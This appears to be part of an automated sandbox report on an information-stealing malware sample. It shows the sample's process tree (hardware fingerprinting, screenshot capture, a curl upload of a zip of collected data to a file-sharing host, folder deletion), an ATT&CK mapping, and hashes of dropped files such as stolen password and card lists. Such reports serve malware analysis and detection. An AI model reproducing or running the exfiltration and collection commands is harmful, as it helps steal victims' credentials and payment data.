    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
  2⤵
  PID:1012
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic memorychip get serialnumber
    3⤵
    PID:4064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
  2⤵
  PID:3532
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic csproduct get uuid
    3⤵
    PID:2040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:4008
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:2600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
  2⤵
  PID:4524
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get processorid
    3⤵
    PID:2236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
  2⤵
  PID:4500
- - C:\Windows\system32\getmac.exe
    getmac /NH
    3⤵
    PID:4712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:5000
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:2080
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:4844
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:1624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:4104
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:3888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:2848
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:3200
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:2868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:316
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:4628
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:3020
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:3812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:2764
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:2060
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:3364
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    - Blocklisted process makes network request
    PID:2488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:2700
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:2104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""
  2⤵
  PID:4508
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Bvrkipts.zip";"
  2⤵
  PID:3956
- - C:\Windows\system32\curl.exe
    curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Bvrkipts.zip";
    3⤵
    PID:4764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:3092
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:4340
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:2168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:4552
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:392
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:3672
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    - Blocklisted process makes network request
    PID:3316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:536
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:3012
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:3852
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:4584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:3884
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:760
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:1620
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:3708
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:3188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""
  2⤵
  PID:4448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:3688
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:4864
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:4976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:3044
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:1916
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:3756
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4208
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:4844
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:4348
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:1576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:1184
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:3212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:696
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:4508
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:1044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4808
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:2628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:2524
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:4012
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:3968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:3316
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:5012
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:4560
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:4516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:2472
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:3536
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:1036
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:2056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:3984

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Steam\Launcher\EN-BVR~1\debug.log

Filesize
2KB

MD5
9446d2324676bf96ef82b0a47864f3b7

SHA1
e2ef142fb14919d59314066e5447f8c3d588edc0

SHA256
4831e31a6fc4a25a4ee1bd060990062f1166dccb93d7ee78eea15ee7e4ba935e

SHA512
7e2cb1f287b43b06a0ec2650ff257ad7f3f319c09900ac32120725ccbce80ed81871542a1c1d135610efa4c12be7a7be3f68975ced20977ffc597f64627bd29f

Download Submit
C:\ProgramData\Steam\Launcher\EN-Bvrkipts.zip

Filesize
2KB

MD5
b6ed7b6e5394a6678e024adc98db9e14

SHA1
29fccdb8e3a810a3efaf2db0eb8204b657b2ede4

SHA256
14a9f7608cf6fe7ab161019e821d265547c9321f7901753ec753ff3280b4eeae

SHA512
0425f4f0989ebfabb0a3394346134eb4e7326d46237794f456471345e5b22c5ceef9e42e15da8e6f20634100a49dad76617916c7dd110546a6b441b38e7c0506

Download Submit
C:\ProgramData\Steam\Launcher\EN-Bvrkipts\Autofills\Autofills.txt

Filesize
94B

MD5
2f308e49fe62fbc51aa7a9b987a630fe

SHA1
1b9277da78babd9c5e248b66ba6ab16c77b97d0b

SHA256
d46a44dd86cea9187e6049fd56bb3b450c913756256b76b5253be9c3b043c521

SHA512
c3065baa302032012081480005f6871be27f26da758dc3b6e829ea8a3458e5c0a4740e408678f3ecf4600279d3fcad796f62f35b8591e46200ce896899573024

Download Submit
C:\ProgramData\Steam\Launcher\EN-Bvrkipts\Cards\Cards.txt

Filesize
70B

MD5
8a0ed121ee275936bf62b33f840db290

SHA1
898770c85b05670ab1450a96ea6fbd46e6310ef6

SHA256
983f823e85d9e4e6849a1ed58e5e3464f3a4adbe9d0daeeadd1416cf35178709

SHA512
7d429ce5c04a2e049cdf3f8d8165a989ab7e3e0ac25a7809c12c4168076492b797d2eebaf271ae02c51cb69786c2574ec3125166444e4fa6fc73430f75f8f154

Download Submit
C:\ProgramData\Steam\Launcher\EN-Bvrkipts\Discord\discord.txt

Filesize
15B

MD5
675951f6d9d75fd2c9c06b5ff547c6fd

SHA1
9b474ab39d1e2aad52ea5272dbac7d4f9fe44c09

SHA256
60fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244

SHA512
44dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea

Download Submit
C:\ProgramData\Steam\Launcher\EN-Bvrkipts\Passwords\Passwords.txt

Filesize
78B

MD5
c5e74f3120dbbd446a527e785dfe6d66

SHA1
11997c2a53d19fd20916e49411c7a61bfb590e9c

SHA256
e0fd13d912d320faaa64e177b4e75f54ec140692ebc5904d10e1cbe3e811ee05

SHA512
a2bab776d22abf857c7df84b3c90851829eda615fbd450c9c72ab89f97591224380990a86c8e7e40ac811aa1225592743eebed63125d519d138fa28b859f2a3f

Download Submit
C:\ProgramData\Steam\Launcher\EN-Bvrkipts\Screenshots\Screenshot.png

Filesize
431KB

MD5
4eecab58b7ecfe6d3637dc8dd50992a9

SHA1
e15020998c65c3f929fa69cf51e7efe7f690dd73

SHA256
34966912a8a03c3da99fe5476909559fa082e4ed28cb66d0ea2d0be3c3ad607d

SHA512
670db380629ae2f0ab77f683023dc72caf0a2b042007f8d295109a7bb1e04feab719b145aac22b2fc4355b04ee65a19363879773504bad8574c9c171f06dfa5c

Download Submit
C:\ProgramData\Steam\Launcher\EN-Bvrkipts\Serial-Check.txt

Filesize
506B

MD5
dbed5046a2bcc1cec4e51cb028879e8c

SHA1
8c29eb7067df53484aba6627ef23122222628a12

SHA256
b355c11c025b9b14d46375d233d6b9226b771535170f887b98d0fc3b5c82e2be

SHA512
554421590e9378351b6d24be13bba24779edc01c84917316ca2d05a9a48e56c14db817049b5518d6410e8010760eac5ef810983c472c0d8106772a0493cc1bde

Download Submit
C:\ProgramData\Steam\Launcher\EN-Bvrkipts\debug.log

Filesize
1KB

MD5
d6316ee78e56bd5d80c58785a8d6737b

SHA1
148cb51470a8d5177b932613e659580138b0037b

SHA256
0a87028fb647f9a053e640365eee835de9242f9784643aaf988c4a671634fd76

SHA512
17d95441b9406f5406ff62ad26fd0d2905d95c8740c1155a16337b4f5f6c15a9d0bc6fbc2da81e91fbbd8c79d5fd211ff03ac2868b04022b5c5251891d0941bd

Download Submit
C:\ProgramData\Steam\Launcher\EN-Bvrkipts\stolen_files.zip

Filesize
22B

MD5
76cdb2bad9582d23c1f6f4d868218d6c

SHA1
b04f3ee8f5e43fa3b162981b50bb72fe1acabb33

SHA256
8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85

SHA512
5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

Download Submit
C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat

Filesize
1KB

MD5
93f90bda499e44e7497ed86627232b18

SHA1
711d3ed2e1d427dd6633ac3f1f258382694ac050

SHA256
e396e532af9adbdce7bf1f018313422779f32e750bc8193131525922334821c2

SHA512
edc2522ce9afef5bbaf9b89990ecb0913fe5d033979c1015682aa2fecde84bf4d757a484d744cf1bad78904e512b9b9632f3beedba1a743a13719216b0adfb4f

Download Submit
C:\ProgramData\edge\Updater\Get-Clipboard.ps1

Filesize
3KB

MD5
a8834c224450d76421d8e4a34b08691f

SHA1
73ed4011bc60ba616b7b81ff9c9cad82fb517c68

SHA256
817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5

SHA512
672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596

Download Submit
C:\ProgramData\edge\Updater\RunBatHidden.vbs

Filesize
146B

MD5
14a9867ec0265ebf974e440fcd67d837

SHA1
ae0e43c2daf4c913f5db17f4d9197f34ab52e254

SHA256
cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1

SHA512
36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3f01549ee3e4c18244797530b588dad9

SHA1
3e87863fc06995fe4b741357c68931221d6cc0b9

SHA256
36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

SHA512
73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c3d0e052ba84a5a94a12f82b5523b45e

SHA1
18c9412da40f1d565c47dc150f782672a8913baa

SHA256
0937d02e49f29b26b70ae49a9709208b79a25cb2b927251e5ef2cce71942638d

SHA512
78a4c052734d4540e190e37c674302d1a234c9d83e0761b1337241519685dbe486b65a8d58919bc2e166c8a58395895fd1385b8a47f5fed4506dbf132ddfc607

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b5e63fad93170364e8e8c416455498e8

SHA1
7939a372147948c466e700e02e02a6703ae5fab8

SHA256
68f3e712c80b1e2f19bdf5763702664e3f3f071bcd0176f67dee08cdf4799c42

SHA512
f02434e360539deee11f2a9f029a1910a2e435e5d7ae170b1d13d1fc7c4062d269c8bf6303b952df5aef5d632040aee8d39fb07686d83e48c129e6f58c637fa1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
4351a39391b279496afc9f6329d742d2

SHA1
53da7969ed2bba9709a4c4130063f91a5e2aef2b

SHA256
a8f7d71b7cb0a57b0e67f3183e36346a9ac62b33bd2ead68ed70f550f0a69d63

SHA512
d955189ef6a427af670d168fd9aa8db4523ef1e8a9698bb20231c9d7b15363cfa9061da9b5492750283ae666567f8f48e2289befc637572281bf9da402d2de8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d8cb3e9459807e35f02130fad3f9860d

SHA1
5af7f32cb8a30e850892b15e9164030a041f4bd6

SHA256
2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68

SHA512
045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
a01e1ea821c8ff55a1417ec05ae3e8e0

SHA1
58d08ebebf04e239cc68c81ec549fdd91801b606

SHA256
b9eb461dada313df29c1d0afd73faa6a19bb9649f46cbb3b198bdbe99883d8a2

SHA512
c53ab72660384fed533ad810244a02384092551683506aad35b7dbc5068a5fa0ea39f5d07f37e63894608d8d87818115d41069ba7fd4b58136f6a167108359d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\1gvvbzbj\1gvvbzbj.dll

Filesize
3KB

MD5
85a41a04b66449882966b3928021c907

SHA1
2db0d143662088b9d831068dc6c8ef4cdcf1a44c

SHA256
20a18b8b8a4f84ee5c5efc64df384766113ffb20c375dfe0a0d50b92f094d9c7

SHA512
e914408bdf4a5269bfccdd91511d24170dc74cd837dcafaa126bb91e3700f21d4ca9867eec55b3afbcb2c259dcdfe00946e7b10834a962c3e3449b204f7c52b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1

Filesize
2KB

MD5
9161beb967c9aa0acb2e15b0e8a229fa

SHA1
3380743736ad0f9acb57f32f0c28c415a2e09a9c

SHA256
4adf851c1a3a8d5c55f904819f9a4d86f1d67c869a01cca6faa731d4889204ba

SHA512
d99999a1ec7d28916dac5679a47f23c61d3520683aa97910c95fce6a924558fc076f38b6b74646b08737aa7d8c7fb5ed1a5dad058c00ace38f5005896463427a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES62C1.tmp

Filesize
1KB

MD5
768306000ca253b0fc155a0ecdd386df

SHA1
455faa6ece933e10253fc3e6b3d10f67eb15553f

SHA256
65ae49a3407fa612eb4f8db9f059d4dc665821d5f79f5769d4ca8cf738817813

SHA512
5f5d104d08fe375d9a17574d467b3c5567440199d8e26a28f2e14b5bffb0219fe8fef9f833b24d016668dee75f6e92c13f1761f028de24f022e0725462120e75

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES6C95.tmp

Filesize
1KB

MD5
0f400277a5b02afb1e4312466b16542b

SHA1
44ab7ebf7e23951e681cfdb4e8644a4188e42f83

SHA256
f260c3628f85b56e65597c1eea3409f12c54280b983a5f546187a138bc7ea6d8

SHA512
6a02f600c411c732360ceda4a740743965e1d3e6e9254488d7eff89a2c24fcd52eb1214139062c9b0e98740d71d4e39966da9618211f3a67c1863d9b00a33171

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qtp3uunn.pu3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

Filesize
1.8MB

MD5
66a65322c9d362a23cf3d3f7735d5430

SHA1
ed59f3e4b0b16b759b866ef7293d26a1512b952e

SHA256
f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c

SHA512
0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

Download Submit
C:\Users\Admin\AppData\Local\Temp\temp.ps1

Filesize
379B

MD5
18047e197c6820559730d01035b2955a

SHA1
277179be54bba04c0863aebd496f53b129d47464

SHA256
348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3

SHA512
1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877

Download Submit
C:\Users\Admin\AppData\Local\Temp\xiju10fn\xiju10fn.dll

Filesize
3KB

MD5
e3c9f8392000e03061324e05e0e6afbd

SHA1
b62929a2d3a574e0534f1d9294aaf86abdd950ce

SHA256
719bbc7942ed818f385e29a85eaf773594185c45cec357665f20212c140e78e5

SHA512
a90b20bce8a3611d671265a78cec489356c6fd6f908d97fda8de63575eb6629eb73925ed77168f12a22a33233815da5114fa113c53c5123be50d637b13ff470b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1gvvbzbj\1gvvbzbj.0.cs

Filesize
426B

MD5
b462a7b0998b386a2047c941506f7c1b

SHA1
61e8aa007164305a51fa2f1cebaf3f8e60a6a59f

SHA256
a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35

SHA512
eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

Download Submit
